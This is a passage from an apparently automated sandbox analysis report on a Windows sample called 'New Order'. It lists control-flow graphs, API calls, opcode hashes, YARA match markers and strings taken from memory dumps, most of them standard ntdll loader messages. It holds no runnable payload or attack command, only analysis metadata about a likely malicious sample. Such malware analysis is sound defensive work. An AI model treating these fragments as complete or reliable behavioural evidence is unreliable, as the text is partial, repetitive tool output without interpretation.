                                                                                                                              • Instruction Fuzzy Hash: 1990026120240007424671594414616440AD7E1301B55C022F6018590DC5258A956626

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 221 1842df0-1842dfc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                              • Instruction ID: 8b2a465b3071ceb2ca8f11c589425ca2738e131e162cb431cd8e2105e6e03cb1
                                                                                                                              • Opcode Fuzzy Hash: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                              • Instruction Fuzzy Hash: FF90023120140417D252715945047070409D7D1341F95C413B5428558DD6568B56A622

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 220 1842c70-1842c7c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                              • Instruction ID: 81c19f638b1a6f09e02ea30b66326b995be5007b2a54d46542b911e8a6f9f34d
                                                                                                                              • Opcode Fuzzy Hash: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                              • Instruction Fuzzy Hash: 6090023120148806D2517159840474A0405D7D1301F59C412B9428658DC6958A957622

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 222 18435c0-18435cc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                              • Instruction ID: 117b82ad7d38cf1d61cb8c5dbec7175b0790706f6d6352d20b33bb99b9478477
                                                                                                                              • Opcode Fuzzy Hash: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                              • Instruction Fuzzy Hash: DC90023160550406D241715945147061405D7D1301F65C412B5428568DC7958B556AA3

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: 6a8d577d45a69f71e0f769b85b49836f697ac926eeab2c36fc6fdfe997539058
                                                                                                                              • Instruction ID: d7c6e6f493b6cacc433219392afa6664265d2d2ebd78ae85f7d082005cb4961d
                                                                                                                              • Opcode Fuzzy Hash: 6a8d577d45a69f71e0f769b85b49836f697ac926eeab2c36fc6fdfe997539058
                                                                                                                              • Instruction Fuzzy Hash: EF1148B1E4021C7FDB10AAE18C81DEFBB7CEF81398F44806AFA0467241D6784E074BA1

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 15 4146a3-4146b5 16 4146bd-41470d call 42fa33 call 417ea3 call 404563 call 4255f3 15->16 17 4146b8 call 42f023 15->17 27 41472d-414733 16->27 28 41470f-41471e PostThreadMessageW 16->28 17->16 28->27 29 414720-41472a 28->29 29->27
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: 88167b4b0e0f4911031dca335308b3dd1a82ee8967a2be2bf5f627821195a5ed
                                                                                                                              • Instruction ID: 3403a82410ff221ad088098878012c6b4d0d4f3bb5f81acc2e425cddafea4f19
                                                                                                                              • Opcode Fuzzy Hash: 88167b4b0e0f4911031dca335308b3dd1a82ee8967a2be2bf5f627821195a5ed
                                                                                                                              • Instruction Fuzzy Hash: D801D6B1D0021C7ADB10AAE69C81DEF7B7CDF81398F448069FA1477241D6784E064BB5

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 30 414687-414689 31 41468b 30->31 32 4146ed-41470d 30->32 33 4146eb-4146ec call 4255f3 31->33 34 41468d-414694 31->34 35 41472d-414733 32->35 36 41470f-41471e PostThreadMessageW 32->36 33->32 36->35 38 414720-41472a 36->38 38->35
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction ID: ac3a77325ec5a8b173158eaa0a57e9d6c8c1764d7cbb0e1981d5f763b3243d9a
                                                                                                                              • Opcode Fuzzy Hash: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction Fuzzy Hash: 66F02BB6E0011C77DB108AD96C828FEBBFCEF42369B008097EE18E7200E6394E424755

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 39 42d1f3-42d237 call 4045f3 call 42e0c3 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D232
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: kA
                                                                                                                              • API String ID: 3298025750-1675843574
                                                                                                                              • Opcode ID: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction ID: b80717368bfedfa27545dbd93d5e703a2b9f3feff49327d32bdfe24bb3b3f875
                                                                                                                              • Opcode Fuzzy Hash: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction Fuzzy Hash: 54E06DB16003147BD614EE5AEC41F9B37ADEFC5714F004419FA08A7241CA71BA118AB9

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 200 42d1a3-42d1e7 call 4045f3 call 42e0c3 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EC94,?,?,00000000,?,0041EC94,?,?,?), ref: 0042D1E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction ID: 2c8bf0c60d6b96f775a2a06d48232a77e81817fba3b295a8a9d5edad12f6c3f5
                                                                                                                              • Opcode Fuzzy Hash: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction Fuzzy Hash: AAE092B12012147FD710EF5AEC41F9B37ACEFC5714F004419FA08A7241C675B9118BB9

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 210 42d243-42d27c call 4045f3 call 42e0c3 ExitProcess
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,A5EDBFDD,?,?,A5EDBFDD), ref: 0042D277
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 215 1842c0a-1842c0f 216 1842c11-1842c18 215->216 217 1842c1f-1842c26 LdrInitializeThunk 215->217
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              Strings
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                              • Critical section address., xrefs: 01875502
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                              • 8, xrefs: 018752E3
                                                                                                                              • Thread identifier, xrefs: 0187553A
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                              • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                              • corrupted critical section, xrefs: 018754C2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                              • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                              • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 0187259B
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              Strings
                                                                                                                              • VerifierFlags, xrefs: 01888C50
                                                                                                                              • HandleTraces, xrefs: 01888C8F
                                                                                                                              • VerifierDlls, xrefs: 01888CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                              • VerifierDebug, xrefs: 01888CA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 017F6496
                                                                                                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                              • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                              • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              Strings
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 01842DF0: LdrInitializeThunk.NTDLL ref: 01842DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01840D74
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              Strings
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01838421
                                                                                                                              • @, xrefs: 01838591
                                                                                                                              • LdrpInitializeProcess, xrefs: 01838422
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0183855E
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018721D9, 018722B1
                                                                                                                              • .Local, xrefs: 018328D8
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018722B6
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 018721DE
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              Strings
                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                              • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 01822462
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                              • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              Strings
                                                                                                                              • HEAP: , xrefs: 01813264
                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                              • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-617086771
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
